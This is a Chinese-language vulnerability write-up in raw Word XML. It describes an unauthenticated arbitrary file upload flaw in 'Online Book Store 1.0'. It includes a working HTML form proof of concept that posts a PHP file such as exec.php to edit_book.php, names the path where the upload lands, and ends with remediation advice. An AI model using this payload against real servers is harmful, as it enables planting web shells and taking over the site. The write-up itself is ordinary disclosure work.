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77CB9B1C" w:rsidR="0049271D" w:rsidRPr="00652D7E" w:rsidRDefault="00C725B1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C725B1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 xml:space="preserve">Online Book Store 1.0 </w:t>
      </w:r>
      <w:r w:rsidR="00B4593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任意文件上传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01D920AD" w:rsidR="004D158C" w:rsidRPr="004D158C" w:rsidRDefault="00B4593F" w:rsidP="006B645E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图书管理系统中添加图书功能未验证身份即可上传任意文件，包括php文件</w:t>
      </w:r>
      <w:r w:rsidR="00A23565">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>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172E377C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2E23A8" w:rsidRPr="004740A5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>任意文件上传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4D4FF09D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BE3A0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39801485" w14:textId="47B0299B" w:rsidR="00A03F53" w:rsidRDefault="004A4541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3E1787" wp14:editId="05A28AB6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FB5" w14:textId="2F792A02" w:rsidR="004A4541" w:rsidRPr="00B959E6" w:rsidRDefault="004A4541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如图所示关键代码。当post请求为add时，可以上传image文件，</w:t>
      </w:r>
      <w:r w:rsidR="002C6E1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使用</w:t>
      </w:r>
      <w:r w:rsidR="002C6E14" w:rsidRPr="002C6E1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move_uploaded_file</w:t>
      </w:r>
      <w:r w:rsidR="002C6E1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函数移动上传的文件，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文件路径可知。</w:t>
      </w:r>
      <w:r w:rsidR="00021FD8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并</w:t>
      </w:r>
      <w:r w:rsidR="00021FD8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且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未验证post请求的身份，</w:t>
      </w:r>
      <w:r w:rsidR="00021FD8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即任意post请求都可上传文件。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124C21F2" w:rsidR="000F53EF" w:rsidRDefault="00F66FF9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构造如下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payload</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>来构造上传文件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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E72C70D" w14:textId="77777777" w:rsidR="00F66FF9" w:rsidRPr="00F66FF9" w:rsidRDefault="00F66FF9" w:rsidP="00F66FF9">
      <w:pPr>
        <w:spacing w:afterLines="50" w:after="156" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F66FF9">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>&lt;form method="post" action="http://TARGET/edit_book.php" enctype="multipart/form-data"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="544B1E01" w14:textId="77777777" w:rsidR="00F66FF9" w:rsidRPr="00F66FF9" w:rsidRDefault="00F66FF9" w:rsidP="00F66FF9">
      <w:pPr>
        <w:spacing w:afterLines="50" w:after="156" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pP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  <w:t>&lt;td&gt;&lt;input type="text" name="isbn" value="978-1-49192-706-9" readOnly="true"&gt;&lt;/td&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60CAF5DC" w14:textId="77777777" w:rsidR="00F66FF9" w:rsidRPr="00F66FF9" w:rsidRDefault="00F66FF9" w:rsidP="00F66FF9">
      <w:pPr>
        <w:spacing w:afterLines="50" w:after="156" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pP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  <w:t>&lt;td&gt;&lt;input type="text" name="author" value="Or4nG.M4n aka S4udiExploit" required&gt;&lt;/td&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6546EF88" w14:textId="77777777" w:rsidR="00F66FF9" w:rsidRPr="00F66FF9" w:rsidRDefault="00F66FF9" w:rsidP="00F66FF9">
      <w:pPr>
        <w:spacing w:afterLines="50" w:after="156" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pP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  <w:t>&lt;td&gt;&lt;input type="file" name="image"&gt;&lt;/td&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D6022D9" w14:textId="77777777" w:rsidR="00F66FF9" w:rsidRPr="00F66FF9" w:rsidRDefault="00F66FF9" w:rsidP="00F66FF9">
      <w:pPr>
        <w:spacing w:afterLines="50" w:after="156" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pP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  <w:t xml:space="preserve">    &lt;input type="submit" name="save_change" value="Change" class="btn btn-primary"&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00F66FF9">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00F66FF9">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C25D4FF" w14:textId="48398B17" w:rsidR="00F66FF9" w:rsidRDefault="00F66FF9" w:rsidP="00F66FF9">
      <w:pPr>
        <w:spacing w:afterLines="50" w:after="156" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F66FF9">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:tab/>
        <w:t>&lt;/form&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6299C8A5" w14:textId="13605FFC" w:rsidR="00BA2753" w:rsidRPr="00F66FF9" w:rsidRDefault="00B73EDB" w:rsidP="00F66FF9">
      <w:pPr>
        <w:spacing w:afterLines="50" w:after="156" w:line="360" w:lineRule="auto"/>
        <w:rPr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-&gt; after you upload your'e file u will find it here /store/bootstrap/img/[FILE].php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53FD50E9" w14:textId="0058127B" w:rsidR="00582DD6" w:rsidRDefault="004E0DF4" w:rsidP="00F66FF9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复制代码保存为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，用浏览器打开，</w:t>
      </w:r>
      <w:r w:rsidR="00B05EBB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>选择</w:t>
      </w:r>
      <w:r w:rsidR="00B05EBB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>e</w:t>
      </w:r>
      <w:r w:rsidR="004709A1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>xec</w:t>
      </w:r>
      <w:r w:rsidR="00B05EBB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.php</w:t>
      </w:r>
      <w:r w:rsidR="00B05EBB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>上传</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A62A718" w14:textId="32AA9AB4" w:rsidR="00B05EBB" w:rsidRDefault="009035B8" w:rsidP="00F66FF9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FA605" wp14:editId="7374B947">
            <wp:extent cx="5274310" cy="2299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ABC1" w14:textId="6E21E747" w:rsidR="00C5456A" w:rsidRDefault="00C5456A" w:rsidP="00F66FF9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上传文件路径</w:t>
      </w:r>
      <w:r w:rsidRPr="00F66FF9">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> /store/bootstrap/img/[FILE].php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C178198" w14:textId="3B8C3F7A" w:rsidR="00582DD6" w:rsidRPr="00F66FF9" w:rsidRDefault="000126A8" w:rsidP="00F66FF9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E6BFD98" wp14:editId="23AE09A7">
            <wp:extent cx="5274310" cy="1323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1A199762" w14:textId="099B06B7" w:rsidR="000260DB" w:rsidRDefault="000260DB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验证请求对象的身份是否合法。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09B83023" w14:textId="7650F024" w:rsidR="0049271D" w:rsidRPr="00652D7E" w:rsidRDefault="000260DB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 </w:t>
      </w:r>
      <w:r w:rsidRPr="000260DB">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>上传</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>图片</w:t>
      </w:r>
      <w:r w:rsidRPr="000260DB">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>位置对文件类型和文件名称等做限制，仅允许上传png、jpg等图片文件。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E512" w14:textId="77777777" w:rsidR="000321D8" w:rsidRDefault="000321D8" w:rsidP="002C024D">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="3E96EC00" w14:textId="77777777" w:rsidR="000321D8" w:rsidRDefault="000321D8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87DD" w14:textId="77777777" w:rsidR="000321D8" w:rsidRDefault="000321D8" w:rsidP="002C024D">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="2695210C" w14:textId="77777777" w:rsidR="000321D8" w:rsidRDefault="000321D8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26A8"/>
    <w:rsid w:val="00013050"/>
    <w:rsid w:val="00021FD8"/>
    <w:rsid w:val="00024957"/>
    <w:rsid w:val="00025932"/>
    <w:rsid w:val="000260DB"/>
    <w:rsid w:val="00031823"/>
    <w:rsid w:val="000321D8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6E14"/>
    <w:rsid w:val="002C7EF6"/>
    <w:rsid w:val="002D2C3B"/>
    <w:rsid w:val="002D7963"/>
    <w:rsid w:val="002E23A8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09A1"/>
    <w:rsid w:val="004740A5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541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0DF4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2DD6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04FA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5B8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23565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5EBB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593F"/>
    <w:rsid w:val="00B46BAA"/>
    <w:rsid w:val="00B52443"/>
    <w:rsid w:val="00B64505"/>
    <w:rsid w:val="00B65487"/>
    <w:rsid w:val="00B65A24"/>
    <w:rsid w:val="00B73EDB"/>
    <w:rsid w:val="00B75881"/>
    <w:rsid w:val="00B959E6"/>
    <w:rsid w:val="00BA11EF"/>
    <w:rsid w:val="00BA2753"/>
    <w:rsid w:val="00BA4098"/>
    <w:rsid w:val="00BA40AC"/>
    <w:rsid w:val="00BB6F3C"/>
    <w:rsid w:val="00BC64B5"/>
    <w:rsid w:val="00BD18ED"/>
    <w:rsid w:val="00BD25DD"/>
    <w:rsid w:val="00BE050B"/>
    <w:rsid w:val="00BE3A0E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456A"/>
    <w:rsid w:val="00C56FFD"/>
    <w:rsid w:val="00C62299"/>
    <w:rsid w:val="00C622A3"/>
    <w:rsid w:val="00C64163"/>
    <w:rsid w:val="00C715AA"/>
    <w:rsid w:val="00C725B1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72FA0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586F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6FF9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71</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2019-04-30T03:22:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-08-17T09:28:00Z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